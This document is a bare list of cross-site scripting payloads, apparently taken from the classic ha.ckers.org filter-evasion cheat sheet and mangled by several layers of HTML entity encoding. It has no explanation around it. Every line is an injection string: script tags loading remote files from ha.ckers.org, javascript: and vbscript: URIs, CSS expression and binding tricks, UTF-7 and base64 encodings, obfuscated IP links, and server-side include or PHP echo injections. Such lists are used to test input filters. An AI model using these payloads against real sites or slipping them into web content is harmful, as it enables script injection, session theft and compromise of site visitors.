&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
